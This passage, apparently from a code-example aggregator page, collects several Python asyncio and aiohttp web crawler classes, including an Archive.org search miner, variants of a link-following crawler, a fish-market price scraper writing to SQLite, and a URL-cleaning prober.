        for doc in j.get('response', {}).get('docs', []):
            if not doc.get('identifier'):
                continue
            identifiers.append(doc['identifier'])
        for req in metadata_requests(identifiers, params, callback, self):
            self.iq.put_nowait(req)

    def search_requests(self, query=None, params=None, callback=None, mine_ids=None):
        """Mine Archive.org search results.

        :param query: The Archive.org search query to yield results for.
                      Refer to https://archive.org/advancedsearch.php#raw
                      for help formatting your query.
        :type query: str

        :param params: The URL parameters to send with each request sent
                       to the Archive.org Advancedsearch Api.
        :type params: dict
        """
        # If mining ids, devote half the workers to search and half to item mining.
        if mine_ids:
            self.max_tasks = self.max_tasks // 2
        # When mining ids, the only field we need returned is "identifier".
        if mine_ids and params:
            params = dict((k, v) for k, v in params.items() if 'fl' not in k)
            params['fl[]'] = 'identifier'

        # Make sure "identifier" is always returned in search results.
        params = params or {}
        fields = [k for k in params if 'fl' in k]
        if (len(fields) == 1) and (not any('identifier' == params[k] for k in params)):
            # Make sure to not overwrite the existing fl[] key.
            i = 0
            while params.get('fl[{}]'.format(i)):
                i += 1
            params['fl[{}]'.format(i)] = 'identifier'

        search_params = self.get_search_params(query, params)
        url = make_url('/advancedsearch.php', self.protocol, self.hosts)

        search_info = self.get_search_info(search_params)
        total_results = search_info.get('response', {}).get('numFound', 0)
        total_pages = (int(total_results/search_params['rows']) + 1)

        for page in range(1, (total_pages + 1)):
            params = deepcopy(search_params)
            params['page'] = page
            if not callback and mine_ids:
                callback = self._handle_search_results
            req = MineRequest('GET', url, self.access,
                              callback=callback,
                              max_retries=self.max_retries,
                              debug=self.debug,
                              params=params,
                              connector=self.connector)
            yield req

    @asyncio.coroutine
    def mine_items(self):
        while True:
            request = yield from self.iq.get()
            yield from self.make_rate_limited_request(request)
            self.iq.task_done()

    @asyncio.coroutine
    def search(self, query=None, params=None, callback=None, mine_ids=None):
        search_requests = self.search_requests(query, params, callback, mine_ids)
        if mine_ids:
            workers = [asyncio.Task(self.mine_items(), loop=self.loop)
                       for _ in range(self.max_tasks)]

        yield from self.mine(search_requests)
        # Wait a bit for all connections to close.
        yield from asyncio.sleep(1)

        if mine_ids:
            for w in workers:
                w.cancel()
Example #13
class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    """
    def __init__(self, roots,
                 exclude=None, strict=True,  # What to crawl.
                 max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, loop=None):

        # get_domain() is assumed to return the output file path for this domain.
        self.path = get_domain(roots)

        if not os.path.exists(os.path.dirname(self.path)):
            os.makedirs(os.path.dirname(self.path))

        with open(self.path, 'w') as temp_file:
            print('writing')
            temp_file.write('Domain name:')
            temp_file.write(roots)
            temp_file.write('\n \n')

        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.connector = aiohttp.TCPConnector(loop=self.loop)
        self.root_domains = set()
#        for root in roots:
#            parts = urllib.parse.urlparse(root)
#            host, port = urllib.parse.splitport(parts.netloc)
#            if not host:
#                continue
#            if re.match(r'\A[\d\.]*\Z', host):
#                self.root_domains.add(host)
#            else:
##                host = host.lower()
#                if self.strict:
#                    self.root_domains.add(host)
#                else:
#                    self.root_domains.add(lenient_host(host))
#        for root in roots:
#            print("true root")
#            print(root)
#            self.add_url(root)
        self.add_url(roots)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        """Close resources."""
        self.connector.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()
                # Mick - raw HTML page
                #print(text)
                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']?([^\s"'<>]+)''',
                                      text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r',
                                len(urls), response.url)

                for url in urls:

                    # if url.find("/ibm/console/logon.jsp?action=OK") != -1:
                    #     print("There is a login page")

                    normalized = urllib.parse.urljoin(response.url, url)

#                    path = get_domain(str(normalized))

                    with open(self.path, 'a') as temp_file:
                        temp_file.write(str(normalized) + ',\n')

                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from aiohttp.request(
                    'get', url,
                    connector=self.connector,
                    allow_redirects=False,
                    loop=self.loop)
                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)
                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url, client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        if is_redirect(response):
            location = response.headers['location']
            next_url = urllib.parse.urljoin(url, location)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=next_url,
                                                 status=response.status,
                                                 exception=None,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))

            if next_url in self.seen_urls:
                return
            if max_redirect > 0:
                LOGGER.info('redirect to %r from %r', next_url, url)
                self.add_url(next_url, max_redirect - 1)
            else:
                LOGGER.error('redirect limit reached for %r from %r',
                             next_url, url)
        else:
            stat, links = yield from self.parse_links(response)
            self.record_statistic(stat)
            for link in links.difference(self.seen_urls):
                self.q.put_nowait((link, self.max_redirect))
            self.seen_urls.update(links)


    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        while True:
            url, max_redirect = yield from self.q.get()
            assert url in self.seen_urls
            yield from self.fetch(url, max_redirect)
            self.q.task_done()

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)

        #TODO Mick - getting a new URL
        #print("new url: ")
        #print(url)

#        path = get_domain(url)

#        with open(path, 'w') as temp_file:
#            print('writing')
#            temp_file.write('Domain name:')
#            temp_file.write(url)
#            temp_file.write('\n \n')
#            temp_file.close()


        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        print("crawling...")
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        assert self.seen_urls == set(stat.url for stat in self.done)
        self.t1 = time.time()
        for w in workers:
            w.cancel()
Example #14
class Crawler:
    """Crawl the aquatic market data of a specific date interval.
    """
    def __init__(self,
                 start_date,
                 end_date,
                 max_tasks=10,
                 max_tries=10,
                 loop=None):
        self.start_date = start_date
        self.end_date = end_date
        self.max_tasks = max_tasks
        self.max_tries = max_tries

        self.loop = loop or asyncio.get_event_loop()
        self.session = aiohttp.ClientSession(loop=self.loop)

        self.q = Queue(loop=self.loop)

        self.t0 = time.time()
        self.t1 = None

        self.make_url_queue()

    def add_url(self, url):
        self.q.put_nowait(url)

    def make_url_queue(self):
        dates = dates_gen_fn(self.start_date, self.end_date)
        for date in dates:
            roc_year = int(date.strftime('%Y')) - 1911
            query_date = '{:3d}{}'.format(roc_year,
                                          date.strftime('%m%d')).replace(
                                              ' ', '0')
            url = BASE_URL.format(query_date, query_date)
            self.add_url(url)

    def close(self):
        self.session.close()

    @asyncio.coroutine
    def parse(self, response):
        # print(response)
        if response.status == 200:
            content_type = response.headers.get('content-type')

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            if content_type in ('text/html', 'application/xml'):
                json = yield from response.json(content_type=content_type)
                if json:
                    # print(len(json))
                    for item in json:
                        # print(item)
                        type_name = item['魚貨名稱']
                        type_code = item['品種代碼']
                        market_name = item['市場名稱']
                        high_price = item['上價']
                        low_price = item['下價']
                        mid_price = item['中價']
                        avg_price = item['平均價']
                        date = item['交易日期']
                        trans_amount = item['交易量']

                        sql = '''
                        INSERT INTO {}
                        (type_name, type_code, market_name, high_price, low_price, mid_price, avg_price, date, trans_amount)
                        VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)'''.format(
                            DATABASE_TABLE)
                        cur.execute(sql, (type_name, type_code, market_name,
                                          high_price, low_price, mid_price,
                                          avg_price, date, trans_amount))

                    conn.commit()

        return

    @asyncio.coroutine
    def fetch(self, url):
        """Fetch one URL."""
        tries = 0
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(url,
                                                       allow_redirects=False)

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url,
                            client_error)
                # exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            return

        try:
            yield from self.parse(response)

        finally:
            yield from response.release()

        print('{} done'.format(url))

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while True:
                url = yield from self.q.get()
                yield from self.fetch(url)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        workers = [
            asyncio.Task(self.work(), loop=self.loop)
            for _ in range(self.max_tasks)
        ]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()

        conn.close()

        dt = self.t1 - self.t0
        print('elapsed time: {}'.format(dt))
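
# Hedged usage sketch (not part of the original source): a minimal driver for
# the crawler class above. The class name `FishPriceCrawler` is hypothetical,
# and the module-level `conn`, `cur`, `DATABASE_TABLE`, `BASE_URL`, `LOGGER`
# and `dates_gen_fn` objects are assumed to be configured as in the original
# module.
def _run_fish_crawler_sketch():
    import asyncio
    import datetime

    loop = asyncio.get_event_loop()
    crawler = FishPriceCrawler(datetime.date(2017, 1, 1),  # hypothetical name
                               datetime.date(2017, 1, 31),
                               max_tasks=10,
                               loop=loop)
    loop.run_until_complete(crawler.crawl())
    crawler.close()
    loop.close()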
예제 #15
class URLCleaner:
    """Preprocess and clean urls."""
    def __init__(self, urls, normalizer, result_saver=print,
                 qsize=None, result_qsize=None, num_workers=1,
                 max_tries=4, timeout=3, max_connections=30, *, loop=None):
        """Async URLCleaner.

        :param normalizer: callable that takes a url and returns the
        normalized url, False when the url is invalid, or None when the url
        can't be validated.

        """
        self.urls = urls
        self.normalizer = normalizer
        self.result_saver = result_saver

        self.loop = loop or asyncio.get_event_loop()
        self.q = Queue(maxsize=qsize or num_workers * 10, loop=self.loop)
        self.result_q = Queue(maxsize=result_qsize or num_workers * 10,
                              loop=self.loop)

        self.num_workers = num_workers
        self.max_tries = max_tries
        self.timeout = timeout
        proxy = os.environ.get('http_proxy')
        if proxy:
            self.connector = aiohttp.ProxyConnector(proxy=proxy,
                                                    limit=max_connections,
                                                    loop=self.loop)
        else:
            self.connector = aiohttp.TCPConnector(limit=max_connections,
                                                  loop=self.loop)

        self.t0 = time.time()
        self.t1 = None
        self.clean_task = None

    def local_clean(self, url):
        local_clean_url = self.normalizer(url)
        if local_clean_url:
            status = 'LOCAL_OK'
        elif local_clean_url is False:
            status = 'LOCAL_INVALID'
            local_clean_url = None
        else:
            status = 'UNCLEANED'
        return URLStat(url=url, local_clean_url=local_clean_url,
                       remote_clean_url=None, status=status, http_code=None,
                       exception=None)

    @asyncio.coroutine
    def remote_clean(self, urlstat):
        """Check URL by HEAD probing it."""
        tries = 0
        exception = None
        url = urlstat.local_clean_url
        headers = {
            'Accept-Encoding': 'identity',
        }
        while tries < self.max_tries:
            try:
                response = yield from asyncio.wait_for(
                    aiohttp.request('head', url, allow_redirects=True,
                                    headers=headers,
                                    connector=self.connector, loop=self.loop),
                    self.timeout, loop=self.loop)
                response.close()

                if tries > 1:
                    logger.info('Try %r for %r success', tries, url)
                break

            except ValueError as error:
                # do not need to retry for these errors
                logger.info('For %r raised %s', url, error)
                tries = self.max_tries
                exception = error

            except aiohttp.HttpProcessingError as e:
                logger.error('Got http error for %r, exception %s', url, e)
                urlstat.http_code = e.code
                urlstat.status = 'REMOTE_ERROR'
                urlstat.exception = e
                return urlstat

            except (aiohttp.ClientError, asyncio.TimeoutError) as error:
                logger.info('Try %r for %r raised %s, %s', tries, url,
                            type(error), error)
                exception = error

            tries += 1
            yield from asyncio.sleep(0.1)
        else:
            # all tries failed
            logger.error('all tries for %r failed, exception %s', url,
                         exception)
            urlstat.status = 'REMOTE_ERROR'
            urlstat.exception = exception
            return urlstat

        urlstat.http_code = response.status

        if response.status == 200:
            remote_clean_url = self.normalizer(response.url)
            if remote_clean_url:
                urlstat.status = 'REMOTE_OK'
                urlstat.remote_clean_url = remote_clean_url
            elif remote_clean_url is False:
                urlstat.status = 'REMOTE_INVALID'
            else:
                # url requires authorization, can't clean
                urlstat.status = 'UNCLEANED'
        else:
            urlstat.status = 'REMOTE_INVALID'

        return urlstat

    @asyncio.coroutine
    def process_url(self, url):
        urlstat = self.local_clean(url)
        if urlstat.status == 'LOCAL_OK':
            urlstat = yield from self.remote_clean(urlstat)
        return urlstat

    def close(self):
        """Close resources."""
        self.connector.close()

    @asyncio.coroutine
    def save_results(self):
        """Save cleaned URLStat."""
        while True:
            urlstat = yield from self.result_q.get()
            try:
                self.result_saver(urlstat)
            except StopIteration:
                self.cancel()

            except Exception as e: # noqa
                logger.exception(e)

            self.result_q.task_done()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        while True:
            url = yield from self.q.get()
            urlstat = yield from self.process_url(url)
            self.q.task_done()
            yield from self.result_q.put(urlstat)

    @asyncio.coroutine
    def _clean(self):
        try:
            self.consumer = asyncio.Task(self.save_results(), loop=self.loop)
            self.workers = [asyncio.Task(self.work(), loop=self.loop) for _ in
                            range(self.num_workers)]
            self.t0 = time.time()

            for url in self.urls:
                yield from self.q.put(url)

            yield from self.q.join()
            yield from self.result_q.join()

            self.t1 = time.time()
            logger.debug('Cleaning time %.2f seconds', self.t1 - self.t0)
            self.cancel()

        finally:
            self.close()

    def clean(self):
        """Run the cleaner until all finished."""
        self.clean_task = asyncio.ensure_future(self._clean(), loop=self.loop)
        return self.clean_task

    def cancel(self):
        self.consumer.cancel()
        for w in self.workers:
            w.cancel()

        self.clean_task.cancel()
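
# Hedged usage sketch (not part of the original source): driving URLCleaner
# with a toy normalizer. `URLStat` and `logger` are assumed to be defined
# elsewhere in the original module; the normalizer and URL below are purely
# illustrative.
def _run_urlcleaner_sketch():
    import asyncio

    def normalizer(url):
        # toy rule: accept http(s) URLs unchanged, reject everything else
        return url if url.startswith(('http://', 'https://')) else False

    loop = asyncio.get_event_loop()
    cleaner = URLCleaner(['http://example.com/'], normalizer,
                         num_workers=5, loop=loop)
    try:
        loop.run_until_complete(cleaner.clean())
    except asyncio.CancelledError:
        # _clean() cancels its own task once all work is done
        pass
    loop.close()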
예제 #16
class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    """
    def __init__(
            self,
            roots,
            exclude=None,
            strict=True,  # What to crawl.
            max_redirect=10,
            max_tries=4,  # Per-url limits.
            max_tasks=10,
            *,
            loop=None):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)  # work queue; put() feeds URLs to the workers
        self.seen_urls = set()
        self.done = []  # list of FetchStatistic namedtuples, one per visited URL
        self.session = aiohttp.ClientSession(loop=self.loop)  # one shared session for all I/O
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(
                root)  # returns 6 parts, including netloc (host + port)
            host, port = urllib.parse.splitport(
                parts.netloc)  # e.g. 'www.baidu.com', 80
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):  # host is all digits/dots (an IP address)
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:  # ignore a leading 'www.'
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)  # add url to seen_urls set
        self.t0 = time.time()  # begin time
        self.t1 = None  # end time

    def close(self):
        """Close resources."""
        self.session.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)  # with 'www.'
        else:
            return self._host_okay_lenient(host)  # without 'www.'

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):  # NOTE: this parsing may not match today's typical page markup; adjust before reuse
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()  # raw bytes of the response body

        if response.status == 200:
            content_type = response.headers.get(
                'content-type')  # only parse responses that declare a content-type
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                # Replace href with (?:href|src) to follow image links.
                # collect candidate URLs from href attributes
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r', len(urls),
                                response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(url=response.url,
                              next_url=None,
                              status=response.status,
                              exception=None,
                              size=len(body),
                              content_type=content_type,
                              encoding=encoding,
                              num_urls=len(links),
                              num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(url,
                                                       allow_redirects=False)
                # the shared session issues the request and returns the response;
                # combined with coroutines this gives concurrent async I/O on a single thread

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url,
                            client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries', url, self.max_tries)
            self.record_statistic(
                FetchStatistic(url=url,
                               next_url=None,
                               status=None,
                               exception=exception,
                               size=0,
                               content_type=None,
                               encoding=None,
                               num_urls=0,
                               num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                # a redirect: join the Location header with the base URL to
                # build the complete next link
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(
                    FetchStatistic(url=url,
                                   next_url=next_url,
                                   status=response.status,
                                   exception=None,
                                   size=0,
                                   content_type=None,
                                   encoding=None,
                                   num_urls=0,
                                   num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    LOGGER.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    LOGGER.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                # not a redirect: parse the page for links, the next stage of
                # coroutine work
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                # only links we have not seen yet
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))  # enqueue for fetching
                self.seen_urls.update(links)
        finally:
            yield from response.release()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls  # every queued url must already be in seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):  # 过滤非法url
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(
                host):  # skip hosts outside the root domains (the roots list lives in crawl.py)
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    # async coroutine: a yield from does not block and wait; the event loop
    # immediately switches to the next runnable crawl coroutine
    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        workers = [
            asyncio.Task(self.work(), loop=self.loop)
            for _ in range(self.max_tasks)
        ]  # create max_tasks worker Tasks (coroutines, not threads)
        self.t0 = time.time()
        yield from self.q.join()  # wait until every queued URL has been processed
        # yield from is explained at: https://www.cnblogs.com/wongbingming/p/9085268.html
        # each slow step lives in its own @asyncio.coroutine def and is chained
        # to the next one with yield from
        self.t1 = time.time()
        for w in workers:
            w.cancel()  # cancel this task
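
# Hedged usage sketch (not from the original source): a minimal driver for the
# Crawler above. FetchStatistic, lenient_host, is_redirect and LOGGER are
# assumed to be defined elsewhere in the module, and the root URL is
# illustrative.
def _run_crawler_sketch():
    import asyncio

    loop = asyncio.get_event_loop()
    crawler = Crawler(['http://example.com/'], max_tasks=10, loop=loop)
    loop.run_until_complete(crawler.crawl())
    print('fetched {} urls in {:.2f}s'.format(len(crawler.done),
                                              crawler.t1 - crawler.t0))
    crawler.close()
    loop.close()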
예제 #17
File: crawling.py Project: zzkhaz/aspider
class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    """

    def __init__(self, roots,
                 # What to crawl.
                 exclude=None, include=None, output=None, strict=True, count=None,
                 proxy=None, max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, loop=None, no_parse_links=False):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.include = include
        self.output = output
        self.count = int(count) if count else None
        self.strict = strict
        self.proxy = proxy
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.task_exit_counter = 0
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        self.no_parse_links = no_parse_links
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None
        self.output_file = self.get_file()

    @asyncio.coroutine
    def close(self):
        """Close resources."""
        yield from self.session.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    def parse_text(self, url, text):
        '''
        Call the callback registered for the matching route, if any.
        '''
        route, args = router.match(url)
        if route:
            route.call(text, **args)

    @asyncio.coroutine
    def parse_links(self, response):
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text(errors='ignore')

                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))
                if urls:
                    logger.debug('got %r distinct urls from %r',
                                 len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(str(response.url), url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

                # parse text
                self.parse_text(str(response.url), text)

                # do outing
                self.handle_output(str(response.url), text)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    def handle_output(self, url, text):
        if self.output:
            d = self.parse_output(url, text)
            logger.info(f'write item: {url}')
            outputing.do_write(self.output, d, self.output_file)

    def parse_output(self, url, text):
        html = HTML(html=text)
        title_ele = html.find('title', first=True)
        d = OrderedDict()
        d['title'] = title_ele.text
        d['url'] = url
        d['datetime'] = now_time()
        d['text'] = text
        return d

    def get_file(self):
        '''
        generate a file name for output
        '''
        domains = list(self.root_domains)
        dt = datetime.datetime.now()
        dt_str = dt.strftime('%Y-%m-%d %H:%M:%S')
        f_name = f'{domains[0]}-{dt_str}'
        if self.output:
            if self.output == 'stream':
                return None
            f_name += f'.{self.output}'
        return f_name

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(
                    url, allow_redirects=False, proxy=self.proxy)

                if tries > 1:
                    logger.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                logger.info('try %r for %r raised %r',
                            tries, url, client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            logger.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(FetchStatistic(url=url,
                                                     next_url=next_url,
                                                     status=response.status,
                                                     exception=None,
                                                     size=0,
                                                     content_type=None,
                                                     encoding=None,
                                                     num_urls=0,
                                                     num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    logger.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    logger.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                # disable parse links
                if not self.no_parse_links:
                    for link in links.difference(self.seen_urls):
                        # use router to verify links
                        if self.verify_url(link) or router.verify_url(link, url):
                            self.q.put_nowait((link, self.max_redirect))
                    self.seen_urls.update(links)
        except Exception as ex:
            logger.error(f'parse error: {url}')
            logger.exception(ex)
        finally:
            yield from asyncio.sleep(1)
            yield from response.release()

    @asyncio.coroutine
    def exit_on_empty_queue(self):
